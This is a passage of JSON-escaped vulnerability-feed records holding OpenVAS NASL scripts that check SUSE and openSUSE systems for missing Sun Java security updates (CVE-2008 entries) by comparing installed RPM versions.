rpm:\"java-1_5_0-sun-plugin~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun\", rpm:\"java-1_5_0-sun~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-alsa\", rpm:\"java-1_5_0-sun-alsa~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-demo\", rpm:\"java-1_5_0-sun-demo~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-devel\", rpm:\"java-1_5_0-sun-devel~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-jdbc\", rpm:\"java-1_5_0-sun-jdbc~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-plugin\", rpm:\"java-1_5_0-sun-plugin~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-src\", rpm:\"java-1_5_0-sun-src~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-demo\", rpm:\"java-1_6_0-sun-demo~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun\", rpm:\"java-1_5_0-sun~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-alsa\", rpm:\"java-1_5_0-sun-alsa~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-demo\", rpm:\"java-1_5_0-sun-demo~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-devel\", rpm:\"java-1_5_0-sun-devel~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-jdbc\", rpm:\"java-1_5_0-sun-jdbc~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-plugin\", rpm:\"java-1_5_0-sun-plugin~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-src\", rpm:\"java-1_5_0-sun-src~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-debuginfo\", rpm:\"java-1_6_0-sun-debuginfo~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-demo\", rpm:\"java-1_6_0-sun-demo~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_4_2-sun\n java-1_4_2-sun-alsa\n java-1_4_2-sun-devel\n java-1_4_2-sun-jdbc\n java-1_4_2-sun-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:136141256231065822", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065822", "type": "openvas", "title": "SLES10: Security update for Sun Java 1.4.2", "sourceData": "#\n#VID slesp2-java-1_4_2-sun-5852\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for Sun Java 1.4.2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_4_2-sun\n java-1_4_2-sun-alsa\n java-1_4_2-sun-devel\n java-1_4_2-sun-jdbc\n java-1_4_2-sun-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65822\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5360\", \"CVE-2008-5359\", \"CVE-2008-5358\", \"CVE-2008-5357\", \"CVE-2008-5356\", \"CVE-2008-5344\", \"CVE-2008-5343\", \"CVE-2008-5342\", \"CVE-2008-5341\", \"CVE-2008-5340\", \"CVE-2008-5339\", \"CVE-2008-2086\", \"CVE-2008-5355\", \"CVE-2008-5354\", \"CVE-2008-5353\", \"CVE-2008-5352\", \"CVE-2008-5351\", \"CVE-2008-5350\", \"CVE-2008-5349\", \"CVE-2008-5348\", \"CVE-2008-5347\", \"CVE-2008-5345\", \"CVE-2008-5346\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for Sun Java 1.4.2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun\", rpm:\"java-1_4_2-sun~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun-alsa\", rpm:\"java-1_4_2-sun-alsa~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun-devel\", rpm:\"java-1_4_2-sun-devel~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun-jdbc\", rpm:\"java-1_4_2-sun-jdbc~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun-plugin\", rpm:\"java-1_4_2-sun-plugin~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_4_2-sun\n java-1_4_2-sun-alsa\n java-1_4_2-sun-devel\n java-1_4_2-sun-jdbc\n java-1_4_2-sun-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:65822", "href": "http://plugins.openvas.org/nasl.php?oid=65822", "type": "openvas", "title": "SLES10: Security update for Sun Java 1.4.2", "sourceData": "#\n#VID slesp2-java-1_4_2-sun-5852\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for Sun Java 1.4.2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_4_2-sun\n java-1_4_2-sun-alsa\n java-1_4_2-sun-devel\n java-1_4_2-sun-jdbc\n java-1_4_2-sun-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65822);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5360\", \"CVE-2008-5359\", \"CVE-2008-5358\", \"CVE-2008-5357\", \"CVE-2008-5356\", \"CVE-2008-5344\", \"CVE-2008-5343\", \"CVE-2008-5342\", \"CVE-2008-5341\", \"CVE-2008-5340\", \"CVE-2008-5339\", \"CVE-2008-2086\", \"CVE-2008-5355\", \"CVE-2008-5354\", \"CVE-2008-5353\", \"CVE-2008-5352\", \"CVE-2008-5351\", \"CVE-2008-5350\", \"CVE-2008-5349\", \"CVE-2008-5348\", \"CVE-2008-5347\", \"CVE-2008-5345\", \"CVE-2008-5346\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for Sun Java 1.4.2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun\", rpm:\"java-1_4_2-sun~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun-alsa\", rpm:\"java-1_4_2-sun-alsa~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun-devel\", rpm:\"java-1_4_2-sun-devel~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun-jdbc\", rpm:\"java-1_4_2-sun-jdbc~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_4_2-sun-plugin\", rpm:\"java-1_4_2-sun-plugin~1.4.2.19~0.3\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:001.", "modified": "2017-07-11T00:00:00", "published": "2009-01-13T00:00:00", "id": "OPENVAS:63151", "href": "http://plugins.openvas.org/nasl.php?oid=63151", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:001 (Sun Java)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_001.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:001 (Sun Java)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sun Java received several security fixes and was updated to:\n\n- Sun Java 1.6.0 to Update 11-b03\n- Sun Java 1.5.0 to Update 17\n- Sun Java 1.4.2 to Update 19\n\nNumerous security issues such as privilege escalations, and sandbox\nbreakouts were fixed.\n\n(CVE-2008-5360, CVE-2008-5359, CVE-2008-5358, CVE-2008-5357,\nCVE-2008-5356, CVE-2008-5344, CVE-2008-5343, CVE-2008-5342,\nCVE-2008-5341, CVE-2008-5340, CVE-2008-5339, CVE-2008-2086,\nCVE-2008-5355, CVE-2008-5354, CVE-2008-5353, CVE-2008-5352,\nCVE-2008-5351, CVE-2008-5350, CVE-2008-5349, CVE-2008-5348,\nCVE-2008-5347, CVE-2008-5345, CVE-2008-5346)\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:001\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:001.\";\n\n \n\nif(description)\n{\n script_id(63151);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-13 22:38:32 +0100 (Tue, 13 Jan 2009)\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:001 (Sun Java)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun\", rpm:\"java-1_5_0-sun~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-alsa\", rpm:\"java-1_5_0-sun-alsa~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-devel\", rpm:\"java-1_5_0-sun-devel~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-jdbc\", rpm:\"java-1_5_0-sun-jdbc~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-plugin\", rpm:\"java-1_5_0-sun-plugin~1.5.0_update17~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u11~1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun\", rpm:\"java-1_5_0-sun~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-alsa\", rpm:\"java-1_5_0-sun-alsa~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-demo\", rpm:\"java-1_5_0-sun-demo~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-devel\", rpm:\"java-1_5_0-sun-devel~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-jdbc\", rpm:\"java-1_5_0-sun-jdbc~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-plugin\", rpm:\"java-1_5_0-sun-plugin~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-src\", rpm:\"java-1_5_0-sun-src~1.5.0_update17~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-demo\", rpm:\"java-1_6_0-sun-demo~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u11~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun\", rpm:\"java-1_5_0-sun~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-alsa\", rpm:\"java-1_5_0-sun-alsa~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-demo\", rpm:\"java-1_5_0-sun-demo~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-devel\", rpm:\"java-1_5_0-sun-devel~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-jdbc\", rpm:\"java-1_5_0-sun-jdbc~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-plugin\", rpm:\"java-1_5_0-sun-plugin~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_5_0-sun-src\", rpm:\"java-1_5_0-sun-src~1.5.0_update17~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-debuginfo\", rpm:\"java-1_6_0-sun-debuginfo~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-demo\", rpm:\"java-1_6_0-sun-demo~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif 